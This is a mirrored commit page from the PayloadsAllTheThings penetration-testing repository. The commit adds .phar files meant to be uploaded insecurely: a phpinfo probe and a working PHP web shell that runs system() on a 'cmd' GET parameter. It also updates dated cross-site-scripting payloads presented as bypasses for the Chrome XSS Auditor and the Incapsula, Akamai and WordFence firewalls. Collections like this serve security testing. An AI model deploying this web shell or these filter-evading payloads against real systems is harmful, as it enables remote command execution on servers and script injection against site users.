mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 21:35:27 +00:00
Phar PHP shell files
This commit is contained in:
parent
ea0bddc18a
commit
0070ac5dc4
1
Upload insecure files/PHP Extension/phpinfo.phar
Normal file
1
Upload insecure files/PHP Extension/phpinfo.phar
Normal file
@ -0,0 +1 @@
|
|||||||
|
<?php phpinfo(); ?>
|
1
Upload insecure files/PHP Extension/shell.phar
Normal file
1
Upload insecure files/PHP Extension/shell.phar
Normal file
@ -0,0 +1 @@
|
|||||||
|
<?php echo "Shell";system($_GET['cmd']); ?>
|
@ -823,7 +823,7 @@ Works for CSP like `script-src self`
|
|||||||
|
|
||||||
## Common WAF Bypass
|
## Common WAF Bypass
|
||||||
|
|
||||||
### Chrome Auditor - 9th august
|
### Chrome Auditor - 9th august 2018
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
</script><svg><script>alert(1)-%26apos%3B
|
</script><svg><script>alert(1)-%26apos%3B
|
||||||
@ -831,7 +831,7 @@ Works for CSP like `script-src self`
|
|||||||
|
|
||||||
Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
|
Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
|
||||||
|
|
||||||
### Incapsula WAF Bypass by [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)- 8th march
|
### Incapsula WAF Bypass by [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)- 8th march 2018
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
anythinglr00</script><script>alert(document.domain)</script>uxldz
|
anythinglr00</script><script>alert(document.domain)</script>uxldz
|
||||||
@ -839,25 +839,26 @@ anythinglr00</script><script>alert(document.domain)</script>uxldz
|
|||||||
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
|
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
|
||||||
```
|
```
|
||||||
|
|
||||||
### Incapsula WAF Bypass by [@c0d3G33k](https://twitter.com/c0d3G33k) - 11th september
|
### Incapsula WAF Bypass by [@c0d3G33k](https://twitter.com/c0d3G33k) - 11th september 2018
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
|
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
|
||||||
```
|
```
|
||||||
|
|
||||||
### Akamai WAF Bypass by [@zseano](https://twitter.com/zseano) - 18th june
|
|
||||||
|
### Akamai WAF Bypass by [@zseano](https://twitter.com/zseano) - 18th june 2018
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
?"></script><base%20c%3D=href%3Dhttps:\mysite>
|
?"></script><base%20c%3D=href%3Dhttps:\mysite>
|
||||||
```
|
```
|
||||||
|
|
||||||
### Akamai WAF Bypass by [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480) - 28th october
|
### Akamai WAF Bypass by [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480) - 28th october 2018
|
||||||
|
|
||||||
```html
|
```html
|
||||||
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
|
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
|
||||||
```
|
```
|
||||||
|
|
||||||
### WordFence WAF Bypass by [@brutelogic](https://twitter.com/brutelogic) - 12th september
|
### WordFence WAF Bypass by [@brutelogic](https://twitter.com/brutelogic) - 12th september 2018
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
<a href=javascript:alert(1)>
|
<a href=javascript:alert(1)>
|
||||||
|
Loading…
Reference in New Issue
Block a user